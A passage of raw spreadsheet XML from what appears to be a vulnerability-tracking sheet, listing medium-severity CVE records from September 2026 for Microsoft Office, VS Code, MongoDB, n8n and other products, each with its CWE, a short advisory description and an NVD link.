t="inlineStr"><is><t>CVE-2026-80079</t></is></c><c r="D1142" s="5" t="n"><v>6.5</v></c><c r="E1142" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1142" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1142" s="5" t="inlineStr" /><c r="H1142" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1142" s="5" t="inlineStr" /><c r="J1142" s="5" t="inlineStr" /><c r="K1142" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1142" s="5" t="inlineStr" /><c r="M1142" s="5" t="inlineStr" /><c r="N1142" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1142" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1142" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1142" s="5" t="inlineStr" /><c r="R1142" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1142" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1142" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80079</t></is></c></row><row r="1143"><c r="A1143" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1143" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1143" s="5" t="inlineStr"><is><t>CVE-2026-80082</t></is></c><c r="D1143" s="5" t="n"><v>6.5</v></c><c r="E1143" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1143" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1143" s="5" t="inlineStr" /><c r="H1143" s="5" t="n"><v>0.007</v></c><c r="I1143" s="5" t="inlineStr" /><c r="J1143" s="5" t="inlineStr" /><c r="K1143" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1143" s="5" t="inlineStr" /><c r="M1143" s="5" t="inlineStr" /><c r="N1143" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1143" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1143" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1143" s="5" t="inlineStr" /><c r="R1143" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1143" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1143" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80082</t></is></c></row><row r="1144"><c r="A1144" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1144" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1144" s="5" t="inlineStr"><is><t>CVE-2026-80084</t></is></c><c r="D1144" s="5" t="n"><v>6.5</v></c><c r="E1144" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1144" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1144" s="5" t="inlineStr" /><c r="H1144" s="5" t="n"><v>0.007</v></c><c r="I1144" s="5" t="inlineStr" /><c r="J1144" s="5" t="inlineStr" /><c r="K1144" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1144" s="5" t="inlineStr" /><c r="M1144" s="5" t="inlineStr" /><c r="N1144" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1144" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1144" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1144" s="5" t="inlineStr" /><c r="R1144" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1144" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Outlook allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1144" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80084</t></is></c></row><row r="1145"><c r="A1145" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1145" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1145" s="5" t="inlineStr"><is><t>CVE-2026-80086</t></is></c><c r="D1145" s="5" t="n"><v>6.5</v></c><c r="E1145" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1145" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1145" s="5" t="inlineStr" /><c r="H1145" s="5" t="n"><v>0.007</v></c><c r="I1145" s="5" t="inlineStr" /><c r="J1145" s="5" t="inlineStr" /><c r="K1145" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1145" s="5" t="inlineStr" /><c r="M1145" s="5" t="inlineStr" /><c r="N1145" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1145" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1145" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1145" s="5" t="inlineStr" /><c r="R1145" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1145" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1145" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80086</t></is></c></row><row r="1146"><c r="A1146" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1146" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1146" s="5" t="inlineStr"><is><t>CVE-2026-80087</t></is></c><c r="D1146" s="5" t="n"><v>6.5</v></c><c r="E1146" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1146" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1146" s="5" t="inlineStr" /><c r="H1146" s="5" t="n"><v>0.007</v></c><c r="I1146" s="5" t="inlineStr" /><c r="J1146" s="5" t="inlineStr" /><c r="K1146" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1146" s="5" t="inlineStr" /><c r="M1146" s="5" t="inlineStr" /><c r="N1146" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1146" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1146" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1146" s="5" t="inlineStr" /><c r="R1146" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1146" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1146" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80087</t></is></c></row><row r="1147"><c r="A1147" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1147" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1147" s="5" t="inlineStr"><is><t>CVE-2026-80088</t></is></c><c r="D1147" s="5" t="n"><v>6.5</v></c><c r="E1147" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1147" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1147" s="5" t="inlineStr" /><c r="H1147" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1147" s="5" t="inlineStr" /><c r="J1147" s="5" t="inlineStr" /><c r="K1147" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1147" s="5" t="inlineStr" /><c r="M1147" s="5" t="inlineStr" /><c r="N1147" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1147" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1147" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1147" s="5" t="inlineStr" /><c r="R1147" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1147" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1147" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80088</t></is></c></row><row r="1148"><c r="A1148" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1148" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1148" s="5" t="inlineStr"><is><t>CVE-2026-80089</t></is></c><c r="D1148" s="5" t="n"><v>6.5</v></c><c r="E1148" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1148" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1148" s="5" t="inlineStr" /><c r="H1148" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1148" s="5" t="inlineStr" /><c r="J1148" s="5" t="inlineStr" /><c r="K1148" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1148" s="5" t="inlineStr" /><c r="M1148" s="5" t="inlineStr" /><c r="N1148" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1148" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1148" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1148" s="5" t="inlineStr" /><c r="R1148" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1148" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1148" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80089</t></is></c></row><row r="1149"><c r="A1149" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1149" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1149" s="5" t="inlineStr"><is><t>CVE-2026-80090</t></is></c><c r="D1149" s="5" t="n"><v>6.5</v></c><c r="E1149" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1149" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1149" s="5" t="inlineStr" /><c r="H1149" s="5" t="n"><v>0.007</v></c><c r="I1149" s="5" t="inlineStr" /><c r="J1149" s="5" t="inlineStr" /><c r="K1149" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1149" s="5" t="inlineStr" /><c r="M1149" s="5" t="inlineStr" /><c r="N1149" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1149" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1149" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1149" s="5" t="inlineStr" /><c r="R1149" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1149" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1149" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80090</t></is></c></row><row r="1150"><c r="A1150" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1150" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1150" s="5" t="inlineStr"><is><t>CVE-2026-80091</t></is></c><c r="D1150" s="5" t="n"><v>6.5</v></c><c r="E1150" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1150" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1150" s="5" t="inlineStr" /><c r="H1150" s="5" t="n"><v>0.007</v></c><c r="I1150" s="5" t="inlineStr" /><c r="J1150" s="5" t="inlineStr" /><c r="K1150" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1150" s="5" t="inlineStr" /><c r="M1150" s="5" t="inlineStr" /><c r="N1150" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1150" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1150" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1150" s="5" t="inlineStr" /><c r="R1150" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1150" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1150" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80091</t></is></c></row><row r="1151"><c r="A1151" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1151" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1151" s="5" t="inlineStr"><is><t>CVE-2026-81377</t></is></c><c r="D1151" s="5" t="n"><v>6.5</v></c><c r="E1151" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1151" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1151" s="5" t="inlineStr" /><c r="H1151" s="5" t="n"><v>0.008</v></c><c r="I1151" s="5" t="inlineStr" /><c r="J1151" s="5" t="inlineStr" /><c r="K1151" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L1151" s="5" t="inlineStr" /><c r="M1151" s="5" t="inlineStr" /><c r="N1151" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1151" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1151" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1151" s="5" t="inlineStr" /><c r="R1151" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S1151" s="5" t="inlineStr"><is><t>Improper limitation of a pathname to a restricted directory ('path traversal') in Visual Studio Code allows an unauthorized attacker to perform tampering over a network.</t></is></c><c r="T1151" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81377</t></is></c></row><row r="1152"><c r="A1152" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1152" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1152" s="5" t="inlineStr"><is><t>CVE-2026-81792</t></is></c><c r="D1152" s="5" t="n"><v>6.5</v></c><c r="E1152" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1152" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G1152" s="5" t="inlineStr" /><c r="H1152" s="5" t="n"><v>0.002</v></c><c r="I1152" s="5" t="inlineStr" /><c r="J1152" s="5" t="inlineStr" /><c r="K1152" s="5" t="inlineStr" /><c r="L1152" s="5" t="inlineStr" /><c r="M1152" s="5" t="inlineStr" /><c r="N1152" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1152" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1152" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1152" s="5" t="inlineStr" /><c r="R1152" s="5" t="inlineStr"><is><t>CWE-266</t></is></c><c r="S1152" s="5" t="inlineStr"><is><t>Unauthenticated Privilege Escalation in Product Catalog Enquiry for WooCommerce by MultiVendorX &lt;= 6.1.4 versions.</t></is></c><c r="T1152" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81792</t></is></c></row><row r="1153"><c r="A1153" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1153" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1153" s="5" t="inlineStr"><is><t>CVE-2026-81802</t></is></c><c r="D1153" s="5" t="n"><v>6.5</v></c><c r="E1153" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1153" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G1153" s="5" t="inlineStr" /><c r="H1153" s="5" t="n"><v>0.002</v></c><c r="I1153" s="5" t="inlineStr" /><c r="J1153" s="5" t="inlineStr" /><c r="K1153" s="5" t="inlineStr" /><c r="L1153" s="5" t="inlineStr" /><c r="M1153" s="5" t="inlineStr" /><c r="N1153" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1153" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1153" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1153" s="5" t="inlineStr" /><c r="R1153" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S1153" s="5" t="inlineStr"><is><t>Unauthenticated Insecure Direct Object References (IDOR) in WpEvently &lt;= 5.6.0 versions.</t></is></c><c r="T1153" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81802</t></is></c></row><row r="1154"><c r="A1154" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1154" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1154" s="5" t="inlineStr"><is><t>CVE-2026-82059</t></is></c><c r="D1154" s="5" t="n"><v>6.5</v></c><c r="E1154" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1154" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1154" s="5" t="inlineStr" /><c r="H1154" s="5" t="n"><v>0.003</v></c><c r="I1154" s="5" t="inlineStr" /><c r="J1154" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1154" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1154" s="5" t="inlineStr" /><c r="M1154" s="5" t="inlineStr" /><c r="N1154" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1154" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1154" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1154" s="5" t="inlineStr" /><c r="R1154" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="S1154" s="5" t="inlineStr"><is><t>An internal aggregation expression in MongoDB Server was incorrectly registered as accessible to any authenticated user rather than being restricted to internal cluster operations. By crafting a malformed index specification within this expression, an authenticated user with read-only privileges could trigger an assertion failure in the index key generation code path. In certain build configurations, this assertion failure results in termination of the mongod process, causing a denial of service to all connected clients.</t></is></c><c r="T1154" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82059</t></is></c></row><row r="1155"><c r="A1155" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1155" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1155" s="5" t="inlineStr"><is><t>CVE-2026-82069</t></is></c><c r="D1155" s="5" t="n"><v>6.5</v></c><c r="E1155" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1155" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1155" s="5" t="inlineStr" /><c r="H1155" s="5" t="n"><v>0.003</v></c><c r="I1155" s="5" t="inlineStr" /><c r="J1155" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1155" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1155" s="5" t="inlineStr" /><c r="M1155" s="5" t="inlineStr" /><c r="N1155" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1155" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1155" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1155" s="5" t="inlineStr" /><c r="R1155" s="5" t="inlineStr"><is><t>CWE-212</t></is></c><c r="S1155" s="5" t="inlineStr"><is><t>A security issue in MongoDB Server's query statistics serialization on the router allows users with monitoring privileges to access unredacted search query text from other users' operations. An improper conditional check in the serialization logic causes the data redaction mechanism to be bypassed when processing search queries through the sharded cluster router. This results in sensitive query literals being stored and made accessible through the query statistics interface.</t></is></c><c r="T1155" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82069</t></is></c></row><row r="1156"><c r="A1156" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1156" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1156" s="5" t="inlineStr"><is><t>CVE-2026-84282</t></is></c><c r="D1156" s="5" t="n"><v>6.5</v></c><c r="E1156" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1156" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1156" s="5" t="inlineStr" /><c r="H1156" s="5" t="n"><v>0.002</v></c><c r="I1156" s="5" t="inlineStr" /><c r="J1156" s="5" t="inlineStr" /><c r="K1156" s="5" t="inlineStr" /><c r="L1156" s="5" t="inlineStr" /><c r="M1156" s="5" t="inlineStr" /><c r="N1156" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1156" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1156" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1156" s="5" t="inlineStr" /><c r="R1156" s="5" t="inlineStr" /><c r="S1156" s="5" t="inlineStr"><is><t>A Server-Side Request Forgery (SSRF) vulnerability exists in the ONLYOFFICE ownCloud Integration plugin version 9.12. The /apps/onlyoffice/ajax/settings/address endpoint does not sufficiently validate the user-supplied Document Server URL before initiating outbound connections. An authenticated administrator can manipulate the document server parameter to cause the ownCloud server to send arbitrary requests to attacker-controlled destinations, including localhost and internal network hosts. This allows internal network reconnaissance and TCP port scanning based on differences in server responses.</t></is></c><c r="T1156" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84282</t></is></c></row><row r="1157"><c r="A1157" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1157" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1157" s="5" t="inlineStr"><is><t>CVE-2026-84391</t></is></c><c r="D1157" s="5" t="n"><v>6.5</v></c><c r="E1157" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1157" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G1157" s="5" t="inlineStr" /><c r="H1157" s="5" t="n"><v>0.002</v></c><c r="I1157" s="5" t="inlineStr" /><c r="J1157" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1157" s="5" t="inlineStr" /><c r="L1157" s="5" t="inlineStr" /><c r="M1157" s="5" t="inlineStr" /><c r="N1157" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1157" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1157" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1157" s="5" t="inlineStr" /><c r="R1157" s="5" t="inlineStr"><is><t>CWE-457</t></is></c><c r="S1157" s="5" t="inlineStr"><is><t>A use of uninitialized variable vulnerability in Fortinet FortiAnalyzer 7.6.3 through 7.6.6 may allow attacker to denial of service via &lt;insert attack vector here&gt;</t></is></c><c r="T1157" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84391</t></is></c></row><row r="1158"><c r="A1158" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1158" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1158" s="5" t="inlineStr"><is><t>CVE-2026-84685</t></is></c><c r="D1158" s="5" t="n"><v>6.5</v></c><c r="E1158" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1158" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1158" s="5" t="inlineStr" /><c r="H1158" s="5" t="n"><v>0.002</v></c><c r="I1158" s="5" t="inlineStr" /><c r="J1158" s="5" t="inlineStr" /><c r="K1158" s="5" t="inlineStr" /><c r="L1158" s="5" t="inlineStr" /><c r="M1158" s="5" t="inlineStr" /><c r="N1158" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1158" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1158" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1158" s="5" t="inlineStr" /><c r="R1158" s="5" t="inlineStr"><is><t>CWE-488</t></is></c><c r="S1158" s="5" t="inlineStr"><is><t>The react-native-auth0 SDK's web platform implementation does not scope its in-memory token cache to individual user sessions when operating in a server-side rendering (SSR) environment where module state persists across HTTP requests. Under the listed preconditions, tokens cached in module memory can be retrieved across subsequent requests processed by the same server runtime.</t></is></c><c r="T1158" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84685</t></is></c></row><row r="1159"><c r="A1159" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1159" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1159" s="5" t="inlineStr"><is><t>CVE-2026-86077</t></is></c><c r="D1159" s="5" t="n"><v>6.5</v></c><c r="E1159" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1159" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1159" s="5" t="inlineStr" /><c r="H1159" s="5" t="n"><v>0.003</v></c><c r="I1159" s="5" t="inlineStr" /><c r="J1159" s="5" t="inlineStr" /><c r="K1159" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1159" s="5" t="inlineStr" /><c r="M1159" s="5" t="inlineStr" /><c r="N1159" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1159" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1159" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1159" s="5" t="inlineStr" /><c r="R1159" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1159" s="5" t="inlineStr"><is><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is></c><c r="T1159" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86077</t></is></c></row><row r="1160"><c r="A1160" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1160" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1160" s="5" t="inlineStr"><is><t>CVE-2026-86078</t></is></c><c r="D1160" s="5" t="n"><v>6.5</v></c><c r="E1160" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1160" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1160" s="5" t="inlineStr" /><c r="H1160" s="5" t="n"><v>0.003</v></c><c r="I1160" s="5" t="inlineStr" /><c r="J1160" s="5" t="inlineStr" /><c r="K1160" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1160" s="5" t="inlineStr" /><c r="M1160" s="5" t="inlineStr" /><c r="N1160" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1160" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1160" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1160" s="5" t="inlineStr" /><c r="R1160" s="5" t="inlineStr"><is><t>CWE-1321</t></is></c><c r="S1160" s="5" t="inlineStr"><is><t>n8n is an open source workflow automation platform. Prior to 2.37.7 and 2.38.2, the Instance AI workflow summary used node names and connection keys from stored workflows as ordinary object keys. A workflow submitted through the REST API could contain __proto__ or constructor, causing nested writes to reach Object.prototype in the main n8n process and disrupt later requests. The affected function is summarizeWorkflowStructure in packages/@n8n/instance-ai/src/tools/workflows/summarize-workflow.ts. This issue is fixed in versions 2.37.7 and 2.38.2.</t></is></c><c r="T1160" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86078</t></is></c></row><row r="1161"><c r="A1161" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1161" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1161" s="5" t="inlineStr"><is><t>CVE-2026-86079</t></is></c><c r="D1161" s="5" t="n"><v>6.5</v></c><c r="E1161" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1161" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1161" s="5" t="inlineStr" /><c r="H1161" s="5" t="n"><v>0.003</v></c><c r="I1161" s="5" t="inlineStr" /><c r="J1161" s="5" t="inlineStr" /><c r="K1161" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1161" s="5" t="inlineStr" /><c r="M1161" s="5" t="inlineStr" /><c r="N1161" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1161" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1161" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1161" s="5" t="inlineStr" /><c r="R1161" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S1161" s="5" t="inlineStr"><is><t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, the Elasticsearch and ElasticSecurity nodes interpolated workflow-controlled index and document identifiers directly into REST request paths. An identifier containing path separators or dot segments could select another index or a cluster administration endpoint under the stored Elasticsearch credential. The affected request construction includes packages/nodes-base/nodes/Elastic/Elasticsearch/GenericFunctions.ts and the missing toPathSegment encoding. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t></is></c><c r="T1161" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86079</t></is></c></row><row r="1162"><c r="A1162" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1162" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1162" s="5" 